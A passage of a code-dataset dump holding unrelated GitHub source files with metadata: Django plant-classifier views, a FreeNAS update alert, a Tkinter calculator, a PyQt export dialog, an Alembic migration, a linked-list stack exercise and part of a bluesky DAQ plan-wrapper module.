context[\"s1\"]=b1+\"\\n\\n\"+str(y)+\"%\"\r\n context[\"s2\"]=c1+\"\\n\\n\"+str(z)+\"%\"\r\n context[\"s3\"]=d1+\"\\n\\n\"+str(w)+\"%\"\r\n context[\"s4\"]=e1+\"\\n\\n\"+str(j)+\"%\"\r\n context[\"step1\"]=test.iloc[a-1][0]\r\n context[\"step2\"]=test.iloc[a-1][1]\r\n context[\"step3\"]=test.iloc[a-1][2]\r\n context[\"step4\"]=test.iloc[a-1][4]\r\n context[\"step5\"]=test.iloc[a-1][3]\r\n path_img1 = \"media/semi/\"+str(b)+\".jpg\"\r\n context[\"u1\"]=path_img1\r\n path_img2 = \"media/semi/\"+str(c)+\".jpg\"\r\n context[\"u2\"]=path_img2\r\n path_img3 = \"media/semi/\"+str(d)+\".jpg\"\r\n context[\"u3\"]=path_img3\r\n path_img4 =\"media/semi/\"+str(e)+\".jpg\"\r\n context[\"u4\"]=path_img4\r\n print(a,b,c,d,e)\r\n return render(request,\"page1.html\",context)\r\n else:\r\n return render(request,\"page1.html\")\r\n\r\ndef predImg2(request):\r\n if request.method == 'GET': \r\n context = {} \r\n val=request.GET['p1']\r\n with open('media/new.json', 'r') as f:\r\n cat_to_name = json.load(f)\r\n for key, value in cat_to_name.items():\r\n if val == value:\r\n k=key\r\n pathimg=\"media/semi/\" + k +\".jpg\"\r\n context[\"url\"] = pathimg\r\n print(context[\"url\"]) \r\n testimage = pathimg\r\n probs,classes= predict(testimage,model)\r\n test=pd.read_csv('media/data.csv',encoding='utf-8')\r\n b=classes[0,1].tolist()\r\n c=classes[0,2].tolist()\r\n d=classes[0,3].tolist()\r\n e=classes[0,4].tolist()\r\n a1=cat_to_name[k]\r\n b1=cat_to_name[str(b)]\r\n c1=cat_to_name[str(c)]\r\n d1=cat_to_name[str(d)]\r\n e1=cat_to_name[str(e)]\r\n x=classes[0,0].tolist()\r\n y=classes[0,1].tolist()\r\n z=classes[0,2].tolist()\r\n w=classes[0,3].tolist()\r\n j=classes[0,4].tolist()\r\n context[\"classes\"]=a1\r\n context[\"s1\"]=b1+\"\\n\\n\"+str(y)+\"%\"\r\n context[\"s2\"]=c1+\"\\n\\n\"+str(z)+\"%\"\r\n context[\"s3\"]=d1+\"\\n\\n\"+str(w)+\"%\"\r\n context[\"s4\"]=e1+\"\\n\\n\"+str(j)+\"%\"\r\n a=int(k)\r\n context[\"step1\"]=test.iloc[a-1][0]\r\n context[\"step2\"]=test.iloc[a-1][1]\r\n context[\"step3\"]=test.iloc[a-1][2]\r\n context[\"step4\"]=test.iloc[a-1][4]\r\n context[\"step5\"]=test.iloc[a-1][3]\r\n path_img1 = \"media/semi/\"+str(b)+\".jpg\"\r\n context[\"u1\"]=path_img1\r\n path_img2 = \"media/semi/\"+str(c)+\".jpg\"\r\n context[\"u2\"]=path_img2\r\n path_img3 = \"media/semi/\"+str(d)+\".jpg\"\r\n context[\"u3\"]=path_img3\r\n path_img4 =\"media/semi/\"+str(e)+\".jpg\"\r\n context[\"u4\"]=path_img4\r\n print(a,b,c,d,e)\r\n return render(request,\"page1.html\",context)\r\n else:\r\n return render(request,\"page1.html\")\r\n\r\n# def home(request):\r\n# return HttpResponse(\"Hello, Django!\")\r\n\r\n# def predImg1(request):\r\n# if request.method == 'POST':\r\n \r\n# context = {}\r\n# uploaded_file= request.FILES['img']\r\n# fs = FileSystemStorage()\r\n# name = fs.save(uploaded_file.name, uploaded_file)\r\n# context[\"url\"] = fs.url(name)\r\n# print(context[\"url\"])\r\n# df=pd.read_csv('media/data.csv',encoding='utf-8')\r\n# info=df.iloc[0][0]\r\n# context[\"gg\"]=info\r\n# return render(request,'asmaa.html',context);\r\n\r\n# def test(request):\r\n# fs = FileSystemStorage()\r\n# var1 = request.GET['1']\r\n# context[\"url\"]=fs.url(var1)\r\n# return render(request,'t3.html',context);","repo_name":"tuqaty/Plant-Explorer","sub_path":"applic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6285353104","text":"from django.utils.translation import ugettext as _\n\nfrom freenasOS.Update import PendingUpdates\nfrom freenasUI.middleware.notifier import notifier\nfrom freenasUI.system.alert import alertPlugins, Alert, BaseAlert\nfrom freenasUI.system.models import Update\n\n\nclass UpdateCheckAlert(BaseAlert):\n\n interval = 60\n\n def run(self):\n alerts = []\n try:\n Update.objects.order_by('-id')[0]\n except IndexError:\n Update.objects.create()\n\n path = notifier().get_update_location()\n if not path:\n return None\n try:\n updates = PendingUpdates(path)\n except:\n updates = None\n\n if updates:\n alerts.append(\n Alert(\n Alert.OK,\n _(\n 'There is a new update available! Apply it in System '\n '-> Update tab.'\n ),\n )\n )\n return alerts\n\nalertPlugins.register(UpdateCheckAlert)\n","repo_name":"rohitkeshri1986/my-freeNASS","sub_path":"gui/system/alertmods/update_check.py","file_name":"update_check.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"512919720","text":"import tkinter\r\nfrom tkinter import *\r\n\r\n\r\nglobal textvariable\r\n\r\ndef btn_clicked(numbers):\r\n\tglobal operator\r\n\toperator = operator + str(numbers)\r\n\ttext_input.set(operator)\r\n\r\ndef clear_display():\r\n\tglobal operator\r\n\toperator = ''\r\n\ttext_input.set('')\r\n\r\n\r\ndef btn_equals():\r\n try:\r\n global operator\r\n sum_up = str(eval(operator))\r\n intr = str(sum_up)\r\n text_input.set(intr)\r\n operator = ''\r\n except ZeroDivisionError:\r\n err = \"Divided By Zero!!\"\r\n text_input.set(err)\r\n except ValueError:\r\n err2 = 'Value Error'\r\n text_input.set(err2)\r\n except SyntaxError:\r\n err3 = \"Syntax Error\"\r\n text_input.set(err3)\r\n\r\n\r\n\r\n\r\n\r\nroot = tkinter.Tk()\r\nroot.geometry('250x400+300+300')\r\nroot.resizable(0,0)\r\nroot.title('Calculator')\r\nroot.iconbitmap(r'calc.ico')\r\n\r\n\r\noperator = \"\"\r\ntext_input = StringVar()\r\n\r\n\r\n\r\nentry1 =Entry(\r\n\troot,\r\n\tjustify = 'right',\r\n\tfont = ('verdana', 20),\r\n\ttextvariable = text_input,\r\n\tbg = '#ffffff',\r\n\tfg = '#000000',\r\n)\r\n\r\n\r\nentry1.pack(expand = True, fill = 'both')\r\n\r\nrow_1 = Frame(root)\r\nrow_1.pack(expand = True, fill = 'both')\r\n\r\nrow_2 = Frame(root)\r\nrow_2.pack(expand = True, fill = 'both')\r\n\r\nrow_3 = Frame(root)\r\nrow_3.pack(expand = True, fill = 'both')\r\n\r\nrow_4 = Frame(root)\r\nrow_4.pack(expand = True, fill = 'both')\r\n\r\n\r\n\r\nbutton_1 = Button(\r\n\trow_1,\r\n\ttext = \"7\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(7)\r\n)\r\nbutton_1.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\nbutton_2 = Button(\r\n\trow_1,\r\n\ttext = \"8\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(8)\r\n)\r\nbutton_2.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_3 = Button(\r\n\trow_1,\r\n\ttext = \"9\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(9)\r\n)\r\nbutton_3.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_mult = Button(\r\n\trow_1,\r\n\ttext = \"*\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked('*')\r\n)\r\nbutton_mult.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\n\r\nbutton_4 = Button(\r\n\trow_2,\r\n\ttext = \"4\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(4)\r\n)\r\nbutton_4.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\nbutton_5 = Button(\r\n\trow_2,\r\n\ttext = \"5\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(5)\r\n)\r\nbutton_5.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_6 = Button(\r\n\trow_2,\r\n\ttext = \"6\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(6)\r\n)\r\nbutton_6.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\n\r\nbutton_minus = Button(\r\n\trow_2,\r\n\ttext = \"-\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked('-')\r\n)\r\nbutton_minus.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\n\r\n\r\nbutton_7 = Button(\r\n\trow_3,\r\n\ttext = \"1\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(1)\r\n)\r\nbutton_7.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\nbutton_8 = Button(\r\n\trow_3,\r\n\ttext = \"2\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(2)\r\n)\r\nbutton_8.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_9 = Button(\r\n\trow_3,\r\n\ttext = \"3\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked(3)\r\n)\r\nbutton_9.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_plus = Button(\r\n\trow_3,\r\n\ttext = \"+\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked('+')\r\n)\r\nbutton_plus.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\n\r\nbutton_c = Button(\r\n\trow_4,\r\n\ttext = \"C\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = clear_display\r\n)\r\nbutton_c.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\nbutton_0 = Button(\r\n\trow_4,\r\n\ttext = \"0\",\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tfont = ('verdana', 22),\r\n\tcommand = lambda : btn_clicked(0)\r\n\t\r\n)\r\nbutton_0.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\n\r\nbutton_div = Button(\r\n\trow_4,\r\n\ttext = \"/\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = lambda : btn_clicked('/')\r\n)\r\nbutton_div.pack(side = 'left', expand = True, fill = 'both')\r\n\r\nbutton_equal = Button(\r\n\trow_4,\r\n\ttext = \"=\",\r\n\tfont = ('verdana', 22),\r\n\trelief = 'groove',\r\n\tborder = 0,\r\n\tcommand = btn_equals\r\n)\r\nbutton_equal.pack(side = 'left', expand = True, fill = 'both')\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"visionxStudio/Calculator","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70220827689","text":"\n \n# This program is free software; you can redistribute it and/or modify \n# it under the terms of the GNU General Public License as published by \n# the Free Software Foundation; either version 2 of the License, or \n# (at your option) any later version. \n \n# This program is distributed in the hope that it will be useful, \n# but WITHOUT ANY WARRANTY; without even the implied warranty of \n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n#GNU General Public License (http://www.gnu.org/licenses/gpl.txt) \n# for more details. \n\nimport os\n\nfrom PyQt5.QtCore import Qt, pyqtSlot, pyqtSignal\nfrom PyQt5.QtGui import QImage, QPixmap, QIcon, qRgb, qRed, qGreen, qBlue\nfrom PyQt5.QtWidgets import QWidget, QCheckBox, QFileDialog, QComboBox, QSizePolicy, QLineEdit, QLabel, QPushButton, QHBoxLayout, QVBoxLayout\n\nclass QtNewDatasetWidget(QWidget):\n\n closed = pyqtSignal()\n\n def __init__(self, export_area, parent=None):\n super(QtNewDatasetWidget, self).__init__(parent)\n\n self.setStyleSheet(\"background-color: rgb(40,40,40); color: white\")\n TEXT_SPACE = 150\n LINEWIDTH = 300\n\n ###########################################################\n\n self.lblDatasetFolder = QLabel(\"Dataset folder: \")\n self.lblDatasetFolder.setFixedWidth(TEXT_SPACE)\n self.lblDatasetFolder.setAlignment(Qt.AlignRight)\n self.lblExportArea = QLabel(\"Area to export: \")\n self.lblExportArea.setFixedWidth(TEXT_SPACE)\n self.lblExportArea.setAlignment(Qt.AlignRight)\n\n self.lblSplitMode = QLabel(\"Dataset split:\")\n self.lblSplitMode.setFixedWidth(TEXT_SPACE)\n self.lblSplitMode.setAlignment(Qt.AlignRight)\n self.lblTargetScale = QLabel(\"Target pixel size:\")\n self.lblTargetScale.setFixedWidth(TEXT_SPACE)\n self.lblTargetScale.setAlignment(Qt.AlignRight)\n\n\n layoutH0a = QVBoxLayout()\n layoutH0a.setAlignment(Qt.AlignRight)\n layoutH0a.addWidget(self.lblDatasetFolder)\n layoutH0a.addWidget(self.lblExportArea)\n layoutH0a.addWidget(self.lblSplitMode)\n layoutH0a.addWidget(self.lblTargetScale)\n\n ###########################################################\n\n self.editDatasetFolder = QLineEdit(\"temp\")\n self.editDatasetFolder.setStyleSheet(\"background-color: rgb(55,55,55); border: 1px solid rgb(90,90,90)\")\n self.editDatasetFolder.setMinimumWidth(LINEWIDTH)\n self.editExportArea = QLineEdit(\"\")\n self.editExportArea.setStyleSheet(\"background-color: rgb(55,55,55); border: 1px solid rgb(90,90,90)\")\n self.editExportArea.setMinimumWidth(LINEWIDTH)\n self.comboSplitMode = QComboBox()\n self.comboSplitMode.setStyleSheet(\"background-color: rgb(55,55,55); border: 1px solid rgb(90,90,90)\")\n self.comboSplitMode.setFixedWidth(LINEWIDTH)\n self.comboSplitMode.addItem(\"Uniform (vertical)\")\n self.comboSplitMode.addItem(\"Uniform (horizontal)\")\n # self.comboSplitMode.addItem(\"Random\")\n self.comboSplitMode.addItem(\"Biologically-inspired\")\n self.editTargetScale = QLineEdit(\"1.0\")\n self.editTargetScale .setStyleSheet(\"background-color: rgb(55,55,55); border: 1px solid rgb(90,90,90)\")\n self.editTargetScale .setMinimumWidth(LINEWIDTH)\n\n self.area_to_export = [0, 0, 0, 0]\n self.setAreaToExport(export_area[0], export_area[1], export_area[2], export_area[3])\n\n layoutH0b = QVBoxLayout()\n layoutH0b.setAlignment(Qt.AlignLeft)\n layoutH0b.addWidget(self.editDatasetFolder)\n layoutH0b.addWidget(self.editExportArea)\n layoutH0b.addWidget(self.comboSplitMode)\n layoutH0b.addWidget(self.editTargetScale)\n\n ###############################################################\n\n self.btnChooseDatasetFolder = QPushButton(\"...\")\n self.btnChooseDatasetFolder.clicked.connect(self.chooseDatasetFolder)\n\n self.btnChooseExportArea = QPushButton()\n exportAreaIcon = QIcon(\"icons\\\\select_area.png\")\n self.btnChooseExportArea.setIcon(exportAreaIcon)\n\n layoutH0c = QVBoxLayout()\n layoutH0c.addWidget(self.btnChooseDatasetFolder)\n layoutH0c.addWidget(self.btnChooseExportArea)\n layoutH0c.addStretch()\n\n layoutH1 = QHBoxLayout()\n layoutH1.addLayout(layoutH0a)\n layoutH1.addLayout(layoutH0b)\n layoutH1.addLayout(layoutH0c)\n\n ###########################################################\n\n self.checkOversampling = QCheckBox(\"Oversampling\")\n self.checkTiles = QCheckBox(\"Show exported tiles\")\n\n layoutH2 = QHBoxLayout()\n layoutH2.setAlignment(Qt.AlignCenter)\n layoutH2.addStretch()\n #layoutH2.addWidget(self.checkOversampling)\n layoutH2.addWidget(self.checkTiles)\n layoutH2.addStretch()\n\n ###########################################################\n\n layoutH3 = QHBoxLayout()\n\n self.btnCancel = QPushButton(\"Cancel\")\n self.btnCancel.clicked.connect(self.close)\n self.btnExport = QPushButton(\"Export\")\n\n layoutH3.setAlignment(Qt.AlignRight)\n layoutH3.addStretch()\n layoutH3.addWidget(self.btnCancel)\n layoutH3.addWidget(self.btnExport)\n\n ###########################################################\n\n layoutV = QVBoxLayout()\n layoutV.addLayout(layoutH1)\n layoutV.addLayout(layoutH2)\n layoutV.addLayout(layoutH3)\n self.setLayout(layoutV)\n\n self.setWindowTitle(\"Export New Training Dataset - Settings\")\n self.setWindowFlags(Qt.Window | Qt.CustomizeWindowHint | Qt.WindowCloseButtonHint | Qt.WindowTitleHint)\n\n @pyqtSlot()\n def chooseDatasetFolder(self):\n\n folderName = QFileDialog.getExistingDirectory(self, \"Choose a Folder to Export the Dataset\", \"\")\n if folderName:\n self.editDatasetFolder.setText(folderName)\n\n def closeEvent(self, event):\n self.closed.emit()\n super(QtNewDatasetWidget, self).closeEvent(event)\n\n def setAreaToExport(self, top, left, width, height):\n\n txt = str(int(left)) + ',' + str(int(top)) + ',' + str(int(width)) + ',' + str(int(height))\n self.area_to_export = [top, left, width, height]\n self.editExportArea.setText(txt)\n\n def getAreaToExport(self):\n\n return self.area_to_export\n\n def getDatasetFolder(self):\n\n return self.editDatasetFolder.text()\n\n def getSplitMode(self):\n\n return self.comboSplitMode.currentText()\n\n def getTargetScale(self):\n\n return float(self.editTargetScale.text())\n\n\n","repo_name":"AlbertBarreiro/TFG","sub_path":"source/QtNewDatasetWidget.py","file_name":"QtNewDatasetWidget.py","file_ext":"py","file_size_in_byte":6869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38123227351","text":"\"\"\"Add command to json log\n\nRevision ID: 8ad53c7df321\nRevises: 30b6bc6b6875\nCreate Date: 2020-09-04 07:41:17.435130\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"8ad53c7df321\"\ndown_revision = \"30b6bc6b6875\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"jsonlog\", sa.Column(\"command_executed\", sa.UnicodeText(), nullable=True)\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"jsonlog\", \"command_executed\")\n # ### end Alembic commands ###\n","repo_name":"qlands/FormShare","sub_path":"alembic/versions/8ad53c7df321_add_command_to_json_log.py","file_name":"8ad53c7df321_add_command_to_json_log.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"9394987785","text":"import sys\n\n\nclass Node:\n def __init__(self):\n self.data = None\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.head = Node()\n self.cnt = 0\n\n def append(self, data):\n new_node = Node()\n new_node.data = data\n cur = self.head\n while cur.next is not None:\n cur = cur.next\n cur.next = new_node\n\n def get_node(self, index):\n cnt = 0\n node = self.head\n while cnt < index:\n cnt += 1\n node = node.next\n return node\n\n def add_node(self, value):\n new_node = Node()\n new_node.data = value\n cur = self.head\n if cur == None:\n self.head = new_node\n else:\n while cur.next is not None:\n cur = cur.next\n cur.next = new_node\n\n def delete_node(self):\n if self.cnt == 0:\n pass\n else:\n node = self.get_node(ll.cnt - 1)\n node.next = None\n\n\nll = LinkedList()\nfor _ in range(int(input())):\n cmd = sys.stdin.readline().strip()\n if cmd == \"pop\":\n temp = Node()\n temp.data = ll.get_node(ll.cnt).data\n ll.delete_node()\n if temp.data == None:\n print(-1)\n else:\n print(temp.data)\n ll.cnt -= 1\n\n elif cmd == \"size\":\n print(ll.cnt)\n elif cmd == \"empty\":\n print(int(ll.cnt == 0))\n elif cmd == \"top\":\n temp = Node()\n temp.data = ll.get_node(ll.cnt).data\n if temp.data == None:\n print(-1)\n else:\n print(temp.data)\n else:\n X = int(cmd[5:])\n ll.add_node(X)\n ll.cnt += 1\n","repo_name":"chrisheo/Algorithm-study","sub_path":"baekjoon/10828_스택.py","file_name":"10828_스택.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19879741603","text":"\"\"\"\nWrappers and decorators to modify existing plans.\n\nThis is the LCLS counterpart to `bluesky.preprocessors`.\n\nThis module contains \"wrapper\" functions that take a plan as an argument\nand yield messages from a new, modified plan, as well as \"decorator\"\nfunctions that can be applied to ``bluesky`` plan functions to return new\nplan functions with modifications.\n\"\"\"\nimport numbers\nfrom functools import wraps\n\nimport bluesky.plan_stubs as bps\nimport bluesky.preprocessors as bpp\nimport numpy as np\nfrom bluesky.utils import make_decorator\n\nfrom . import utils\nfrom .exceptions import DaqNotConfiguredError\n\n\ndef _get_daq():\n \"\"\"\n Helper function to get the active DAQ object.\n\n This also wraps the `pcdsdaq` import because `pcdsdaq` is an optional\n dependency of ``nabs``. This will fail unless `pcdsdaq` is installed.\n\n Returns\n -------\n daq : `pcdsdaq.daq.Daq`\n The DAQ (data aquisition) system `bluesky`-compatible control object.\n \"\"\"\n\n from pcdsdaq.daq import get_daq # NOQA\n daq = get_daq()\n if daq is None:\n raise DaqNotConfiguredError(\n \"The daq must first be configured to be used in a scan.\"\n )\n return daq\n\n\nclass _Dummy:\n \"\"\"\n Class to sub in for the DAQ when we need to drop a message.\n\n You can't just remove a message entirely with\n `bluesky.preprocessors.plan_mutator`, you need\n to yield a compatible message. To accomplish this we sub in a dummy object\n for the daq to create a no-op with the right return value.\n \"\"\"\n def stage(self):\n return [self]\n\n def unstage(self):\n return [self]\n\n\ndef daq_step_scan_wrapper(plan, events=None, duration=None, record=True,\n use_l3t=False):\n \"\"\"\n Wrapper to turn an open plan into a standard LCLS DAQ step plan.\n\n This inserts the DAQ object into every `bluesky.plan_stubs.trigger` and\n `bluesky.plan_stubs.read` pair, ensuring events are taken at every\n bundle. It also stages the `pcdsdaq.daq.Daq` and yields an appropriate\n `bluesky.plan_stubs.configure` message using the input arguments\n and all motors moved prior to the first data point.\n\n The DAQ trigger and the DAQ read always go first, before any other triggers\n or reads, to ensure all events are recorded.\n\n If the DAQ is manually passed into the wrapped plan, and it is the first\n detector in the list, we will skip adding a redundant trigger/read. If the\n DAQ is manually passed in as the second detector or later we will end up\n with two triggers and two reads, which can cause problems. Running a scan\n like this will raise a ``TypeError``.\n\n See `daq_step_scan_decorator` for the function decorator version.\n\n Parameters\n ----------\n plan : plan\n A bluesky plan that yields bluesky Msg objects.\n\n events : int, optional\n Number of events to take at each step. If omitted, uses the\n duration argument or the last configured value.\n\n duration : int or float, optional\n Duration of time to spend at each step. If omitted, uses the events\n argument or the last configured value.\n\n record : bool, optional\n Whether or not to record the run in the DAQ. Defaults to True because\n we don't want to accidentally skip recording good runs.\n\n use_l3t : bool, optional\n Whether or not the use the l3t filter for the events argument. Defaults\n to False to avoid confusion from unconfigured filters.\n\n Returns\n -------\n daq_step_plan : plan\n The same plan as before, but modified appropriately to the run the DAQ\n at every step. This will be an open generator.\n \"\"\"\n\n daq = _get_daq()\n motor_cache = set()\n\n class State:\n first_calib_cycle = True\n first_trigger = True\n first_read = True\n daq_has_triggered = False\n\n def daq_first_cycle(msg):\n if events is not None:\n yield from bps.configure(\n daq,\n events=events,\n record=record,\n use_l3t=use_l3t,\n controls=list(motor_cache),\n )\n elif duration is not None:\n yield from bps.configure(\n daq,\n duration=duration,\n record=record,\n use_l3t=use_l3t,\n controls=list(motor_cache),\n )\n else:\n yield from bps.configure(\n daq,\n record=record,\n use_l3t=use_l3t,\n controls=list(motor_cache),\n )\n return (yield from add_daq_trigger(msg))\n\n def add_daq_trigger(msg):\n if msg.obj is not daq:\n yield from bps.trigger(daq, group=msg.kwargs['group'])\n return (yield msg)\n\n def add_daq_read(msg):\n if msg.obj is not daq:\n yield from bps.read(daq)\n return (yield msg)\n\n def drop_daq_msg(msg):\n if msg.command == 'stage':\n return (yield from bps.stage(_Dummy()))\n if msg.command == 'unstage':\n return (yield from bps.unstage(_Dummy()))\n\n def daq_mutator(msg):\n # Reset \"first\" flags after closing a bundle\n if msg.command in ('save', 'drop'):\n State.first_trigger = True\n State.first_read = True\n State.daq_has_triggered = False\n # Insert daq trigger before first trigger\n elif msg.command == 'trigger':\n if msg.obj is daq:\n if State.daq_has_triggered:\n raise TypeError('Scan misconfigured; daq cannot be passed '\n 'unless it is the first detector.')\n else:\n State.daq_has_triggered = True\n if State.first_trigger:\n State.first_trigger = False\n # Configure before the first begin (after all motors found)\n if State.first_calib_cycle:\n State.first_calib_cycle = False\n return daq_first_cycle(msg), None\n return add_daq_trigger(msg), None\n # Insert daq read before first read\n elif msg.command == 'read' and State.first_read:\n State.first_read = False\n return add_daq_read(msg), None\n # Gather all moving devices for the daq controls configuration arg\n elif msg.command == 'set':\n motor_cache.add(msg.obj)\n # Strip redundant DAQ stages from inner plan\n elif msg.command in ('stage', 'unstage') and msg.obj is daq:\n return drop_daq_msg(msg), None\n # If didn't mutate, return the (None, None) signal for plan_mutator\n return None, None\n\n @bpp.stage_decorator([daq])\n def daq_step_plan():\n return (yield from bpp.plan_mutator(plan, daq_mutator))\n\n return (yield from daq_step_plan())\n\n\ndef daq_step_scan_decorator(plan):\n \"\"\"\n Decorator to turn a plan function into a standard LCLS DAQ step plan.\n\n This adds the standard DAQ configuration arguments\n events, duration, record, and use_l3t onto the plan function\n and wraps the plan in the `daq_step_scan_wrapper` to properly\n execute a step scan.\n\n See `daq_step_scan_standard_args` for argument specifications for the\n standard DAQ configuration arguments.\n\n Parameters\n ----------\n plan : plan\n A bluesky plan that yields bluesky Msg objects.\n\n Returns\n -------\n daq_step_plan : plan\n The same plan as before, but modified appropriately for DAQ use.\n This will be a callable generator function.\n \"\"\"\n\n @wraps(plan)\n def inner(*args, **kwargs):\n events = kwargs.pop('events', None)\n duration = kwargs.pop('duration', None)\n record = kwargs.pop('record', True)\n use_l3t = kwargs.pop('use_l3t', False)\n return (yield from daq_step_scan_wrapper(plan(*args, **kwargs),\n events=events,\n duration=duration,\n record=record,\n use_l3t=use_l3t))\n\n plan.__signature__ = utils.add_named_kwargs_to_signature(\n plan,\n kwargs=dict(events=None, duration=None, record=True, use_l3t=False),\n )\n return inner\n\n\ndef daq_step_scan_standard_args(events=None, duration=None, record=True,\n use_l3t=False):\n \"\"\"\n No-op function to hold template parameter info for generated docs.\n\n Parameters\n ----------\n events : int, optional\n Number of events to take at each step. If omitted, uses the\n duration argument or the last configured value.\n\n duration : int or float, optional\n Duration of time to spend at each step. If omitted, uses the events\n argument or the last configured value.\n\n record : bool, optional\n Whether or not to record the run in the DAQ. Defaults to True because\n we don't want to accidentally skip recording good runs.\n\n use_l3t : bool, optional\n Whether or not the use the l3t filter for the events argument. Defaults\n to False to avoid confusion from unconfigured filters.\n \"\"\"\n\n pass\n\n\ndef daq_during_wrapper(plan, record=True, use_l3t=False, controls=None):\n \"\"\"\n Wrap a plan so that the DAQ runs at the same time.\n\n This can be used with an ordinary ``bluesky`` plan that you'd like the daq\n to run along with. This also stages the DAQ so that the run start/stop\n will be synchronized with the bluesky runs.\n\n Note that this is not a calib cycle scan. See\n `daq_step_scan_wrapper` and `daq_step_scan_decorator`\n for the calib cycle variant.\n\n All configuration must be done by supplying config kwargs to this wrapper.\n\n This must be applied outside the run_wrapper.\n\n The `daq_during_decorator` is the same as the\n `daq_during_wrapper`, but it is meant to be used as a function\n decorator.\n\n Internally, this uses the flyer interface of the `pcdsdaq.daq.Daq`\n object.\n\n Parameters\n ----------\n plan : plan\n A bluesky plan that yields bluesky Msg objects.\n\n record : bool, optional\n Whether or not to record the run in the DAQ. Defaults to True because\n we don't want to accidentally skip recording good runs.\n\n use_l3t : bool, optional\n Whether or not the use the l3t filter for the events argument. Defaults\n to False to avoid confusion from unconfigured filters.\n\n controls : list of positioners or signals, optional\n If provided, values from these will make it into the DAQ data\n stream as variables. For this purpose, the ``.position`` and\n ``.value`` attributes will be checked, followed by the ``.get()``\n method.\n\n Returns\n -------\n daq_during_plan : plan\n The same plan as before, but modified appropriately to run the DAQ at\n the same time.\n \"\"\"\n daq = _get_daq()\n\n @bpp.stage_decorator([daq])\n def daq_during_plan():\n yield from bps.configure(daq, events=0, record=record,\n use_l3t=use_l3t, controls=controls)\n return (yield from bpp.fly_during_wrapper(plan, flyers=[daq]))\n\n return (yield from daq_during_plan())\n\n\ndef step_size_decorator(plan):\n \"\"\"\n Grab the last argument (number of steps), and intepret as\n - step size if float\n - number of steps if integer\n\n Only works on step scans in one dimension.\n\n Parameters\n ----------\n plan : plan\n A bluesky plan that yields bluesky Msg objects. Must be\n a scan in one dimension, with the last argument being\n the number of scan points / step size.\n\n Returns\n -------\n step_size_plan : plan\n The same plan as before, but modified appropriately to\n differentiate between step size and number of steps.\n This will be a callable generator function.\n \"\"\"\n\n @wraps(plan)\n def inner(*args, **kwargs):\n if 'num' in kwargs:\n # Currently unneeded, since daq_ascan and daq_dscan\n # do not support num kwarg\n n = kwargs.pop('num')\n else:\n # assumes (det_list, motor, start, stop, num)\n det_list, motor, start, stop, n = args\n\n if not isinstance(n, (numbers.Integral, numbers.Real)):\n raise TypeError(\"Step size / number of steps is \"\n \"neither float nor 